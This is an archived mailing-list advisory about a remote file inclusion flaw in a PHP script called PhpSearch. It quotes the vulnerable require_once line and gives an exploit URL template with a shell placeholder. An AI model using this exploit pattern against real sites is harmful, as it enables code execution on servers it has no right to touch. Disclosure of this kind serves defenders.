[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Php Search Remote Inclusion



Script : PhpSearch 
Bug    : Remote File Inclusion
Author : SekoMirza 
Company : http://www.hawkententerprises.org
Download : http://www.hawkenterprises.org/dev/phpsearch.zip
Dork : not yet
_____________________________________________

Where :
phpsearch/utils/class_HTTPRetriever.php

Bug : 
if (is_readable($libcurlemuinc)) require_once($libcurlemuinc);

Explanation : 
if  class_HTTPRetriever.php is readable you can execute malicious code. 

Example : 
http://www.site.com/[path]/utils/class_HTTPRetriever.php?libcurlemuinc=[Sh3LL]

_____________________________________________

Thanx to : Str0ke , Hypn0sis , Earnk Kazno , Shadow , Ph.0 , Class 3rr0r , MadWorM ,   and all hackers